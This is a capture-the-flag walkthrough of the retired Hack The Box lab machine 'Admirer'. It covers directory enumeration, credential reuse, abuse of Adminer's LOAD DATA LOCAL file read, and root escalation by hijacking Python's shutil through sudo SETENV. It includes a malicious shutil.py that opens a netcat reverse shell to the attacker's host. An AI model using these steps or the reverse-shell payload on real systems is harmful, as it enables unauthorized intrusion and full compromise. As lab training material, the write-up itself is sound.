HTB Walkthrough: Admirer (retired)
Admirer is a retired box on HTB and is part of TJ Null’s OCSP-like boxes.
Hostname: Admirer | Difficulty Level: Easy | Operating System: Linux
NMAP Scan
We can port 22 (ssh), 21 (ftp) and 80 (http) open.
HTTP Enumeration
Browsing to http://10.10.10.187 reveals a web page with images. http://10.10.10.187/robots.txt reveals below entry:
User-agent: *
# This folder contains personal contacts and creds, so no one -not even robots- should see it — waldo
Disallow: /admin-dir
Browsing to http://10.10.10.187/admin-dir/ reveals Permission denied.
Running gobuster. The folders ‘assets’ and ‘images’ are getting access denied. Contacts.txt reveals email addresses. Credentials.txt reveals mail account, ftp and wordpress credentials. Performing wordpress scan did not reveal anything.
┌──(kali㉿kali)-[~/labs/HTB/Admirer]
└─$ sudo gobuster dir -t 50 — url http://10.10.10.187 — wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt/assets (Status: 301)
/images (Status: 301)
/server-status (Status: 403)┌──(kali㉿kali)-[~/labs/HTB/Admirer]
└─$ sudo gobuster dir -t 50 — url http://10.10.10.187/admin-dir — wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php/contacts.txt (Status: 200)
/credentials.txt (Status: 200)
We have ftp open, let’s try ftp credentials from ‘admin-dir/credentials.txt’.
┌──(kali㉿kali)-[~/labs/HTB/Admirer]
└─$ ftp 10.10.10.187ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r — r — 1 0 0 3405 Dec 02 2019 dump.sql
-rw-r — r — 1 0 0 5270987 Dec 03 2019 html.tar.gz
226 Directory send OK.
Download these two files using ‘get’ command. Once you gunzip+untar the ‘html.tar.gz’ file, you should be able to see another set of credentials in credentials.txt.
Going through ‘utility-scripts’, it looks like all php files were not discovered. Running gobuster with ‘dirb/big.txt’.
┌──(kali㉿kali)-[/usr/share/wordlists/dirb]
└─$ sudo gobuster dir -t 50 — url http://10.10.10.187/utility-scripts — wordlist /usr/share/wordlists/dirb/big.txt -x php/adminer.php (Status: 200)
/info.php (Status: 200)
/phptest.php (Status: 200)
Browsing to http://10.10.10.187/utility-scripts/info.php, we got below useful info as it is trying to execute phpinfo() and it should be referred for web page related information:
Linux admirer 4.9.0–12-amd64 #1 SMP Debian 4.9.210–1 (2020–01–20) x86_64
Browsing to http://10.10.10.187/utility-scripts/admin_tasks.php reveals a page which executes specific queries. You will get a login page at http://10.10.10.187/utility-scripts/adminer.php. It uses ‘MySQL’, host as localhost, database as admirerdb since it is evident from dump.sql (from FTP).
We were unable to get into http://10.10.10.187/utility-scripts/adminer.php using the credentials we found so far. Let us verify whether we can get a db connection locally on kali from UI. MySQL works on port 3306 and hence, open a nc session on kali on that port. Enter kali ip in localhost and everything else can be random, since we are just verifying if kali is reachable. Once you hit a login button, you should see a connection in nc.
┌──(kali㉿kali)-[~/labs/HTB/Admirer]
└─$ nc -lvnp 3306
listening on [any] 3306 …
connect to [kali ip] from (UNKNOWN) [10.10.10.187] 44662
Let us create our MySQL database in kali.
Creating mysql db in kali:
┌──(kali㉿kali)-[~/labs/HTB/Admirer]
└─$ sudo service mysql startMariaDB [(none)]> Create Database DeleteMe;
MariaDB [(none)]> Create user ‘uni123’@’10.10.10.187' IDENTIFIED BY ‘DontExploit’;
Query OK, 0 rows affected (0.004 sec)
MariaDB [(none)]> GRANT ALL on DeleteMe.* TO ‘uni123’@’10.10.10.187';
Query OK, 0 rows affected (0.001 sec)
MariaDB [(none)]> FLUSH PRIVILEGES;
Running the command flush privileges will reloads the grant tables in the mysql database enabling the changes to take effect without reloading or restarting mysql service. You will not be able to login directly, you need to change the bind addrress IP (127.0.0.1) to 0.0.0.0.
┌──(kali㉿kali)-[/etc/mysql/mariadb.conf.d]
└─$ sudo vi 50-server.cnf
Edit below line for our address in ‘50-server.cnf’.
bind-address = 0.0.0.0
Change the firewall rule to allow external connections on 3306
┌──(kali㉿kali)-[/etc/mysql/mariadb.conf.d]
└─$ ufw allow from 10.10.10.187 to any port 3306Check if 3306 is open for 0.0.0.0
┌──(kali㉿kali)-[/etc/mysql/mariadb.conf.d]
└─$ netstat -pano | grep 3306
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN - off (0.00/0/0)
And login to http://10.10.10.187/utility-scripts/adminer.php? with below details:
MySQL
Server: <Kali IP>
Username: uni123
Password: DontExploit
Database: DeleteMe
Exploitation
Search for “Adminer Exploit” and refer this article — https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool. Exploiting the same vulnerability.
While enumerating ‘utility-scripts/admin_tasks.php’, below file seemed interesting:
echo str_replace(“\n”, “<br />”, shell_exec(“/opt/scripts/admin_tasks.sh $task 2>&1”));
If you try ‘admin_tasks.sh’ in load data local vulnerability, you will get ‘open_basedir’ restriction. In short, it prevents from access any other location other than specified in ‘open_basedir’. Usually, it is .htaccess file but we viewed phpinfo() command output in ‘http://10.10.10.187/utility-scripts/info.php’ and open_basedir was ‘/var/www/html’.
To exploit ‘LOAD DATA LOCAL’ vulnerability, we first need to create a table ‘test with column ’file’ of type ‘longtext’.
Enter below query in ‘SQL command’ window of ‘DeleteMe’ database:
load data local infile ‘/var/www/html/index.php’
into table test
fields terminated by “\n”
Click on ‘select test’ > ‘Select data’ on left side below command. You will see the query result and new database credentials.
Use these credentials to login into admirerdb. Use the same credentials to ssh into server and get user flag.
Privilege Escalation
waldo@admirer:~$ sudo -l
[sudo] password for waldo:
Sorry, try again.
[sudo] password for waldo:
Matching Defaults entries for waldo on admirer:
env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always
User waldo may run the following commands on admirer:
(ALL) SETENV: /opt/scripts/admin_tasks.sh
If you view admin_tasks.sh, all the paths mentioned in different functions are not permitted to create a file. It is executing backup.py, which in turn uses ‘shutil’s’ function ‘make_archive’. [/usr/lib/python3.5/shutil.py]. We can make our own shutil.py with make_archive function. With ‘SETENV’ privileges from ‘sudo -l’ command, we can set python path to point to our own shutil.py (/dev/shm).
import os
#reference method: make_archive(dst, ‘gztar’, src)
def make_archive(a, b, c):
os.system(‘nc <kali ip> 8000 -e “/bin/bash”’)
Once shutil.py is created, allow the connection from 10.10.10.187 on the port mentioned in the script(e.g. 8000).
┌──(kali㉿kali)-[~/…/HTB/Admirer/html/utility-scripts]
└─$ sudo ufw allow from 10.10.10.187 to any port 8000
Open a netcat session on port 8000 in kali.
┌──(kali㉿kali)-[~/…/HTB/Admirer/html/utility-scripts]
└─$ nc -lvnp 8000
Now, replicate ‘SETENV: /opt/scripts/admin_tasks.sh’ and select option ‘6’ and you will get reverse shell with root privilege and root flag.
waldo@admirer:/dev/shm$ sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh.
